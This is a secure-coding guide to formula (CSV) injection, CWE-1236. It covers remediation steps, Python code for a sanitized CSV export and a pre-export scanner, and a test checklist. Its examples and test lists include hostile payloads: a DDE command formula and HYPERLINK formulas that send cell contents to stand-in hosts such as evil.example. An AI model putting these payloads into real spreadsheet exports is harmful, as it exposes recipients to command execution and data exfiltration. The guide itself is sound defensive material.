
CWE-1236: Formula Injection

Overview

Formula Injection (also known as CSV Injection or Excel Injection) occurs when untrusted data that begins with a formula metacharacter (=, +, -, @, tab, carriage return) is written into a spreadsheet export (CSV, Excel, etc.) without neutralization. When the victim opens the file, the spreadsheet application treats such a cell as a formula rather than as text and evaluates it; depending on the function used, the formula can pull in external content, leak other cells to an attacker-controlled URL, or (via DDE) ask to launch a local program.

OWASP Classification

A05:2025 - Injection

Risk

High: Attackers can inject formulas that are evaluated when a victim opens the exported file, potentially leading to command execution through DDE (after the victim accepts the application's security prompts), exfiltration of cell contents via external requests (for example HYPERLINK or WEBSERVICE), or credential theft through a crafted link. The exported file is trusted by the recipient because it came from the application, which is what makes this dangerous in enterprise environments where exports are routinely opened and shared.

Remediation Steps

Core principle: Treat spreadsheet/CSV exports as input to an interpreter: neutralize formula prefixes (=, +, -, @, tab, carriage return) in every cell that carries untrusted data.

Locate the Spreadsheet Export Functionality

Review the security findings to identify where untrusted data is exported to spreadsheets:

  • Find the source: Identify where untrusted data enters (user input, external files, databases, network requests)
  • Trace to the export: Locate where CSV, Excel, or other spreadsheet files are generated
  • Check the data flow: Review what data is being written to spreadsheet cells
  • Identify affected columns: Determine which cells contain untrusted data

Sanitize All Spreadsheet Cell Content

Prevent formula injection by sanitizing untrusted data before writing to cells:

  • Prepend single quote: Add ' (single quote) at the beginning of any untrusted cell whose first non-space character is a formula trigger; Excel and LibreOffice read the apostrophe as a "treat as text" prefix (some applications may display it literally, which is acceptable)
  • Do not silently strip: Removing =, +, -, @, tab or carriage return changes the data (negative numbers, phone numbers, email-style handles); prefer the prefix, or encode, and reserve removal for fields where the characters can never be legitimate
  • Validate cell content: Check that the first non-space character is not =, +, -, @, tab or carriage return before deciding a cell is safe
  • Handle leading whitespace: Check the first non-space character rather than the first byte, so leading spaces cannot hide a formula trigger from the check
  • Apply to all untrusted data: Sanitize every cell that contains data from untrusted sources, not only the column named in the finding
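The sanitization steps above as one working Python module. This is an added example, not code from the original page: the function and constant names (sanitize_cell, starts_formula, export_csv_safe, FORMULA_TRIGGERS) and the sample user rows are my own, the user-export scenario is hypothetical, and the payload list used for verification is taken from the test step later on this page. It shows the usual vulnerable export beside a hardened one built on the standard csv module, and a check that parses the output back to confirm no cell still starts with a formula trigger.

```python
import csv
import io

# First characters that make Excel, LibreOffice Calc and Google Sheets evaluate
# a cell as a formula (CWE-1236). Tab and carriage return are included because
# they can end a field early and let the text after them start a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def starts_formula(value: str) -> bool:
    """True if the first non-space character would start a formula."""
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def sanitize_cell(value):
    """Neutralize one untrusted cell for spreadsheet export.

    Numbers pass through untouched (they cannot carry a formula). A string
    whose first non-space character is a trigger gets a leading apostrophe,
    which Excel/LibreOffice read as a "treat as text" prefix. Embedded quotes
    and delimiters are left to csv.writer, which escapes them per RFC 4180.
    """
    if value is None:
        return ""
    if not isinstance(value, str):
        return value
    return "'" + value if starts_formula(value) else value


def export_csv_unsafe(header, rows):
    """The pattern behind most findings: untrusted values written verbatim."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(header)
    writer.writerows(rows)
    return buf.getvalue()


def export_csv_safe(header, rows, untrusted_columns):
    """Hardened export: sanitize untrusted columns, quote every field."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow(
            sanitize_cell(cell) if i in untrusted_columns else cell
            for i, cell in enumerate(row)
        )
    return buf.getvalue()


def export_is_clean(csv_text: str) -> bool:
    """Parse an export back and confirm no cell still starts a formula."""
    return not any(
        isinstance(cell, str) and starts_formula(cell)
        for row in csv.reader(io.StringIO(csv_text))
        for cell in row
    )


# Constructed sample: a user export where display_name is attacker-controlled
# (column index 1). The domain evil.example is a placeholder.
HEADER = ["id", "display_name", "email"]
SAMPLE_ROWS = [
    [1, "Alice", "alice@example.com"],
    [2, "=cmd|'/c calc'!A1", "mallory@example.com"],  # DDE payload
    [3, '=HYPERLINK("http://evil.example/?"&C3,"click me")', "mallory2@example.com"],
    [4, "  +1+1", "bob@example.com"],  # trigger hidden behind leading spaces
]

# The payloads listed under the test step on this page, plus whitespace variants.
TEST_PAYLOADS = [
    "=1+1", "+1+1", "-1+1", "@SUM(A1:A10)",
    "=cmd|'/c calc'!A1", '=HYPERLINK("http://evil.example")',
    "\t=1+1", "\r=1+1", "  =1+1",
]


def all_neutralized(payloads=TEST_PAYLOADS) -> bool:
    """Every payload must come out text-prefixed; benign text must be untouched."""
    return (all(sanitize_cell(p).startswith("'") for p in payloads)
            and sanitize_cell("Alice") == "Alice")


if __name__ == "__main__":
    print("--- unsafe export ---")
    print(export_csv_unsafe(HEADER, SAMPLE_ROWS))
    print("--- safe export ---")
    safe = export_csv_safe(HEADER, SAMPLE_ROWS, untrusted_columns={1})
    print(safe)
    print("clean:", export_is_clean(safe), "payloads neutralized:", all_neutralized())
```

Only the columns named in untrusted_columns are touched, so legitimately negative numeric columns are not turned into text; if a numeric column is ever populated from user-supplied strings, add it to the set. QUOTE_ALL is not what stops the injection (Excel evaluates a quoted "=1+1" too); the apostrophe is, and the quoting only keeps embedded commas, quotes and line breaks inside their field.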

Use CSV/Excel Libraries with Built-in Protection

Leverage libraries that automatically prevent formula injection:

  • Use safe libraries: Where the CSV/Excel library offers formula injection protection, turn it on; where it does not (most general-purpose CSV writers do not), wrap its cell-writing API with your own sanitizer
  • Enable protection features: Configure the library to escape or text-prefix formula triggers rather than relying on quoting alone, which does not stop evaluation
  • Avoid manual CSV generation: Don't build CSV files with string concatenation; hand-rolled quoting is where embedded quotes, commas and line breaks go wrong
  • Use the library's row and cell writing API: It handles delimiter and quote escaping consistently, so your sanitizer only has to deal with the formula prefix

Set Appropriate File Metadata and Warnings

Provide additional protection through proper file configuration:

  • Set correct MIME types: Use text/csv for CSV and the proper Excel MIME types so the browser hands the file to the intended application rather than guessing
  • Include security warnings: Add warning cells or metadata about untrusted content; this informs the recipient but does not neutralize a payload, so it never replaces cell sanitization
  • Set file properties: Mark files as containing potentially unsafe content
  • Provide download warnings: Inform users about risks when downloading generated files

Add Defense-in-Depth Controls for Exports

Add defense-in-depth protections:

  • Validate before export: Check all data for formula characters before generating file
  • Log export operations: Record what data was exported and by whom
  • Monitor for injection attempts: Alert when formula characters are detected in export data
  • Use allowlists: For enumerated data, validate against known-good values
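The "validate before export", "log", "monitor" and "allowlist" items above as one pre-export gate, written in Python as an added example that is not part of the original page. The function name scan_rows, the logger name export.guard, the status allowlist and the sample rows are all my own assumptions; the idea is that a row set is inspected before the writer sees it, every suspicious cell produces a warning log line with the actor who requested the export, and enumerated columns are rejected when a value falls outside the known-good set instead of being sanitized.

```python
import logging
import re

log = logging.getLogger("export.guard")

# First non-space character that Excel/LibreOffice/Google Sheets treat as the
# start of a formula. Spaces are skipped so they cannot hide a trigger.
FORMULA_START = re.compile(r"^ *[=+\-@\t\r]")

# Hypothetical allowlist for an enumerated column: anything outside the set is
# a finding in its own right, whatever its first character.
COLUMN_ALLOWLISTS = {
    "status": {"active", "suspended", "deleted"},
}


def scan_rows(rows, actor):
    """Inspect rows (list of dicts) before export; log and return findings.

    A finding is (row_index, column, reason, value). Enumerated columns are
    checked against their allowlist; free-text columns for formula starters.
    """
    findings = []
    for idx, row in enumerate(rows):
        for column, value in row.items():
            if column in COLUMN_ALLOWLISTS:
                if value not in COLUMN_ALLOWLISTS[column]:
                    findings.append((idx, column, "not-in-allowlist", value))
            elif isinstance(value, str) and FORMULA_START.match(value):
                findings.append((idx, column, "formula-start", value))
    for idx, column, reason, value in findings:
        # %r keeps tabs and carriage returns visible instead of breaking the line.
        log.warning(
            "possible formula injection actor=%s row=%d column=%s reason=%s value=%r",
            actor, idx, column, reason, value,
        )
    log.info("export actor=%s rows=%d findings=%d", actor, len(rows), len(findings))
    return findings


def should_block(findings) -> bool:
    """Policy hook: refuse the export when any enumerated column is off-list.

    Formula starters in free-text columns are logged and left to the
    sanitizer; an off-list value in an enumerated column means the data
    itself is bad and the export should not proceed.
    """
    return any(reason == "not-in-allowlist" for _, _, reason, _ in findings)


# Constructed sample rows for a user export (display_name is free text,
# status is enumerated).
SAMPLE_ROWS = [
    {"display_name": "Alice", "status": "active"},
    {"display_name": "=cmd|'/c calc'!A1", "status": "active"},
    {"display_name": "Bob", "status": "=1+1"},  # injection via an enumerated column
    {"display_name": "  @SUM(A1:A10)", "status": "suspended"},
    {"display_name": "Carol-Ann", "status": "deleted"},  # hyphen not at start: fine
]


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(levelname)s %(name)s %(message)s")
    found = scan_rows(SAMPLE_ROWS, actor="admin@example.com")
    print("block export:", should_block(found))
```

The warning lines are what a detection rule would key on: a burst of formula-start findings from one actor, or any finding against an enumerated column, is worth an alert, since legitimate data rarely begins with = or @ and never lands outside an allowlist.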

Test with Formula Injection Payloads

Verify the fix prevents formula execution:

  • Test with formula starters: Try =1+1, +1+1, -1+1, @SUM(A1:A10) in every untrusted field
  • Test with exfiltration: Try =HYPERLINK("http://evil.com") and variants that concatenate neighbouring cells into the URL
  • Test with DDE: Try =cmd|'/c calc'!A1 (DDE injection); the victim application may show a security prompt, which is still a finding
  • Test with whitespace and control characters: Try the same payloads with leading spaces, a leading tab, or a leading carriage return
  • Verify the result in the application: Confirm the prefix was added and that the cell renders as literal text when the export is opened in Excel, LibreOffice Calc and Google Sheets, rather than only inspecting the raw file

Additional Resources